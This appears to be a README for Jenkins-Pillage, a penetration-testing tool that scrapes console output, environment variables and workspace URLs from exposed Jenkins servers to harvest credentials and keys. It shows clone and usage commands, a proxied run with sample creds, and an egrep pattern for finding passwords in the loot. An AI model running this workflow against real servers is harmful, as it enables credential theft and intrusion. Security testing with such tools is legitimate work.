Jenkins-Pillage: automatically gathering sensitive information from exposed Jenkins servers

Jenkins-Pillage

This tool will attempt to pull console output, environment variables, and workspaces associated with Jenkins builds. It works both against unauthenticated and authenticated (with creds) servers.

Typically lots of sensitive information may be retrievable from these locations and this tool aims to automate the pillaging of that info. Credentials, API endpoints, private keys, and much more have been gathered using Jenkins-Pillage.

Download

git clone https://github.com/DolosGroup/Jenkins-Pillage.git

Use 

Jenkins-Pillage

Example

Easy mode:

$ ./jenkins-pillage.py -a https://jenkins.example.com Getting a list of all build URLs https://jenkins.example.com/job/Application0/4 https://jenkins.example.com/job/Application1/6 Attempting: https://jenkins.example.com/job/Application0/4 -- FOUND CONSOLE OUTPUT Attempting: https://jenkins.example.com/job/Application1/6 -- FOUND CONSOLE OUTPUT -- FOUND ENV VARS ...

 

List all build URLs recursed from a top-level URL:

$ ./jenkins-pillage.py -l https://jenkins.example.com https://jenkins.example.com/job/Application0/4 https://jenkins.example.com/job/Application1/6 ...

 

Pull the console output, workspace zip url, and environment variables of a build recursed from above:

$ ./jenkins-pillage.py -b https://jenkins.example.com/job/Application0/4 Attempting: https://jenkins.example.com/job/Application0/4 -- FOUND CONSOLE OUTPUT -- FOUND ENV VARS -- FOUND WORKSPACE ZIP URL

 

Same but behind an SSH proxy and needs creds to work:

$ export all_proxy=socks4a://localhost:1080 $ ./jenkins-pillage.py -b https://jenkins.example.com/job/Application0/4 -u admin -p Password1 Attempting: https://jenkins.example.com/job/Application0/4 -- FOUND CONSOLE OUTPUT -- FOUND ENV VARS -- FOUND WORKSPACE ZIP URL

 

The files are pulled down to the current directory. The URL for the zip download is placed in a file as opposed to downloading the zip because many of the zips I’ve seen can easily fill up your hard drive. Once the files are downloaded, grep to your hearts’ delight:

$egrep -i 'password|Authorization.*Basic|sqlplus|<other_creds_or_commands>' *

 

Copyright (C) 2019 Dolos Group

Source: https://github.com/DolosGroup/